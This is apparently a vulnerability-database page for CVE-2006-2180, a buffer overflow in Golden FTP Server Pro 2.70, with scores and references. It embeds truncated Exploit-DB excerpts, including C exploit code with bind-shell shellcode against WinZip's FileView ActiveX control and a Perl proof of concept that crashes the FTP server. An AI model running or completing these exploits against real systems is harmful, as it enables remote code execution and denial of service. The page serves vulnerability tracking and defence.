CVE-2006-2180
published 2006-05-04CVE-2006-2180: Buffer overflow in Golden FTP Server Pro 2.70 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long…
PriorityP431medium6.4CVSS 2.0
AVNACLAuNCNIPAP
EXPLOIT
EPSS
6.84%
93.2th percentile
Buffer overflow in Golden FTP Server Pro 2.70 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long argument to the (1) NLST or (2) APPE commands, as demonstrated by the Infigo FTPStress Fuzzer.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kmint21_software | golden_ftp_server | — | — |
| kmint21_software | golden_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 7 - CSS Width Element Denial of Service
exploitdb·2006-12-06
CVE-2006-6311 Microsoft Internet Explorer 7 - CSS Width Element Denial of Service
Microsoft Internet Explorer 7 - CSS Width Element Denial of Service
---
source: https://www.securityfocus.com/bid/21466/info
Microsoft Internet Explorer is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.
This issue is triggered when an attacker entices a victim user to visit a malicious website.
Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.
Internet Explorer 6 and 7 are vulnerable to this issue; other versions may also be affected.
Another non-standards compliant IE D.O.S. IE makes my life harder :(. It sucks, don't use it :). Written by xiam. Tested under IE 6.0.2900.2180
Exploit-DB
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
exploitdb·2006-11-15
CVE-2006-6884 WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow
---
/* WinZip
*
* - prdelka
*/
#include
#include
#include
#include
#include
#include
#include
#define NOPSIZE 999999
struct target {
char* name;
int retaddr;
};
struct shellcode {
char* name;
short port;
int host;
char* shellcode;
};
int targetno = 1;
struct target targets[] = {
{"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
};
int shellno = 2;
struct shellcode shellcodes[] = {
{"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
"\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
"\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
"\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
"\x93\x46\x2f\x90\xfd\x4a\x6a\x51
Exploit-DB
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
exploitdb·2006-05-03
CVE-2006-2180 Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
Golden FTP Server Pro 2.70 - 'APPE' Remote Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# Golden FTP Server Pro 2.70 Remote APPE command PoC exploit : DoS
# /JA
# https://www.securinfos.info
#
use Net::FTP;
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
if (($host) && ($port)) {
# Exploit string (try with a different value if needed)
$exploit_string = "./A" x 1000;
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 60, Debug=> $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "test";
$pass = "test";
}
$sock->login($user, $pass);
sleep(1);
$answer = $sock->message;
print $answer ."\n";
print "Sending string...\n";
$sock->quot("APP
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2006-05/0139.htmlhttp://marc.info/?l=bugtraq&m=114658586018818&w=2http://secunia.com/advisories/19917http://www.infigo.hr/en/in_focus/toolshttp://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03http://www.osvdb.org/25217http://www.securityfocus.com/bid/17801http://www.vupen.com/english/advisories/2006/1640https://exchange.xforce.ibmcloud.com/vulnerabilities/26195http://archives.neohapsis.com/archives/bugtraq/2006-05/0139.htmlhttp://marc.info/?l=bugtraq&m=114658586018818&w=2http://secunia.com/advisories/19917http://www.infigo.hr/en/in_focus/toolshttp://www.infigo.hr/hr/in_focus/advisories/INFIGO-2006-05-03http://www.osvdb.org/25217http://www.securityfocus.com/bid/17801http://www.vupen.com/english/advisories/2006/1640https://exchange.xforce.ibmcloud.com/vulnerabilities/26195
2006-05-04
Published